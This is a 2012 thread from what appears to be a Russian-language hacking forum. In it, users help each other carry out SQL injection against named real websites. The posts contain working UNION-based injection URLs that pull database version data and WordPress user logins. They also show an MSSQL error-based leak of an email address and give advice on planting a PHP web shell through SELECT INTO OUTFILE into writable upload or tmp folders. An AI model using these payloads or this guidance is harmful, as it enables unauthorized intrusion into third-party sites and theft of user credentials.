09.03.2012, 21:53
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Сообщение от Faaax
man ну ты вообще
читай тут на ачате статьи по sql injection,админка находится либо от того какая cms либо простым брутом
Ок, еще бы про составление запроса проконсультировали бы
|
|
|
09.03.2012, 22:16
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от Faaax
помогите раскрутить,вроде всё правильно делаю
Код:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f
Если очень постараться, то можно раскрутить
5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2
так что дерзай
|
|
|
|
09.03.2012, 22:47
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от er9j6@
Если очень постараться, то можно раскрутить
5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2
так что дерзай
И в подтверждение своих слов ты наверное сейчас всех удивишь и покажешь вектор атаки именно НА ЭТОМ МЕСТЕ, да?
|
|
|
|
10.03.2012, 14:50
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:
Код:
HTTP/1.1 500 Internal Server Error
Date: Sat, 10 Mar 2012 09:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9201
Conversione non riuscita durante la conversione del valore nvarchar 'u:baudo@apre.it' nel tipo di dati int.
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема? |
|
|
|
10.03.2012, 15:38
|
|
Новичок
Регистрация: 13.06.2010
Сообщений: 0
С нами:
8375537
Репутация:
0
|
|
Можно ли залить шелл на InstantCMS v1.9 ?
|
|
|
|
10.03.2012, 15:50
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от durito
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?
Дамперы думают, что ошибка в запросе и не дампить. А самописные дампить должны. Посмотри, нет ли перенаправлений.
|
|
|
|
10.03.2012, 17:31
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,COLUMN_NAME,3/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=%27wp_users%27/**/LIMIT/**/2,1--
Так выводит, а так нет...
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,UNHEX%28HEX%28user_login%29%29,3/**/FROM/**/wp_users%27/**/LIMIT/**/0,1--
Как вывести?
P.S: использовать функции ASCII() и CHAR? |
|
|
|
10.03.2012, 17:33
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами:
8308406
Репутация:
0
|
|
выручайте!
есть рут доступ к phpmyadmin.
мне уже один товарищ помог с залитием шелла, спасибо ему за это, но вопрос такой:
когда я пишу код
Код:
SELECT '' INTO OUTFILE '/dir/name/shell.php'
где указываю установочный путь, который я узнал из инъекции. и потом мне выдает что я не имею права записи в эту папку. вообще никуда. хотя нужно заметить что доступ рут.
решил пойти в обход, дал команду SELECT @@datadir которая мне выдала свободную папку /var/lib/mysql/
туда все спокойно льется, только понять где находится заветный php файл мне не удается.
Прошу помочь вас разобраться с первым вопросом или со вторым. Мб я что-то не так делаю |
|
|
|
10.03.2012, 18:02
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
aydin-ka,
в другой базе твоя таблица.
Узнаем вот так:
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT+table_schema+from+information_schema.tables+where+table_name='wp_users'),3--+
Теперь выводит логин:
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT user_login from smokycarrotcom1.wp_users limit 0,1),3--+f
stan0009,
Из /var/lib/mysql/ не сможешь выполнять скрипты. Ищи папки, типа /uplaods/, /images/, /tmp/ и т.д. и т.п. Там обычно CHMOD 755 or 777.
|
|
|
|
10.03.2012, 18:05
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами:
8308406
Репутация:
0
|
|
Ereee
меня вот что удивляет что захожу из под root а пишет что нет доступа(
в чем прикол понятия не имею.
Всмысле которые в корне(/tmp/) или которые например в /home/site/dir/tmp/ ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
